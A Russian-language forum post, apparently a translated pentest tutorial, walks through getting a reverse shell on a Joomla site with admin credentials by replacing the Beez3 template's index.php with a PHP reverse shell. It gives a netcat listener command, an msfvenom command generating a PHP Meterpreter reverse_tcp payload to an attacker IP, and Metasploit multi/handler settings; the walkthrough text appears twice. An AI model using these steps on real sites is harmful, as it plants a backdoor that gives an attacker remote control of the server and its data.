Joomla - это одна из популярных систем управления контентом (CMS), которая помогает вам создать свой веб-сайт. Joomla приобрела свою популярность благодаря простоте использования, легкой настройке во время установки; и относительной надежности. В этой статье мы узнаем, как получить обратную оболочку Joomla.
Как вы можете видеть на изображении ниже, сайт сделан на Joomla. Теперь, когда у нас есть среда Joomla, мы начинаем ее использовать.
Атака, которую мы собираемся показать, относится к категории постэксплуатационных; это означает, что нужно иметь учетные данные Joomla. URL-адрес страницы входа в Joomla будет состоять из «joomla/administrator», и здесь введите имя пользователя и пароль, как показано на рисунке ниже:
После того, как вы вошли в систему, перейдите к расширениям. Появится выпадающее меню, из этого меню выберите шаблоны; как показано на рисунке ниже:
Вам отобразитса список шаблонов, представленных на веб-сайте, и поэтому мы будем использовать один из них, то есть детали и файлы Beez3.
Когда вы окажетесь в шаблоне, перейдите к index.php, как показано на рисунке ниже:
Таким образом, вы сможете редактировать index.php в шаблоне, как вы можете видеть на картинке ниже:
Теперь подмените код index.php с на reverse shell, который есть в Kali Linux, и добавьте свой IP-адрес и порт в коде, как показано на рисунке ниже:
Теперь активируйте netcat, чтобы получить сеанс с помощью следующей команды:
Другой способ получить reverse shell - msfvenom, и для этого типа используйте следующую команду:
Приведенная выше команда выдаст вам вредоносный код php. Подмените этот код, как и прежде, и одновременно запустите multi/handler, как показано на рисунке ниже:
Это были два способа получить обратную оболочку в Joomla.
Перевод:
Как вы можете видеть на изображении ниже, сайт сделан на Joomla. Теперь, когда у нас есть среда Joomla, мы начинаем ее использовать.
Атака, которую мы собираемся показать, относится к категории постэксплуатационных; это означает, что нужно иметь учетные данные Joomla. URL-адрес страницы входа в Joomla будет состоять из «joomla/administrator», и здесь введите имя пользователя и пароль, как показано на рисунке ниже:
После того, как вы вошли в систему, перейдите к расширениям. Появится выпадающее меню, из этого меню выберите шаблоны; как показано на рисунке ниже:
Вам отобразитса список шаблонов, представленных на веб-сайте, и поэтому мы будем использовать один из них, то есть детали и файлы Beez3.
Когда вы окажетесь в шаблоне, перейдите к index.php, как показано на рисунке ниже:
Таким образом, вы сможете редактировать index.php в шаблоне, как вы можете видеть на картинке ниже:
Теперь подмените код index.php с на reverse shell, который есть в Kali Linux, и добавьте свой IP-адрес и порт в коде, как показано на рисунке ниже:
Теперь активируйте netcat, чтобы получить сеанс с помощью следующей команды:
nc -lvp 1234
Другой способ получить reverse shell - msfvenom, и для этого типа используйте следующую команду:
msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R
Приведенная выше команда выдаст вам вредоносный код php. Подмените этот код, как и прежде, и одновременно запустите multi/handler, как показано на рисунке ниже:
Код:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.9
set lport 1234
exploit
Это были два способа получить обратную оболочку в Joomla.
Перевод:
Ссылка скрыта от гостей
Последнее редактирование: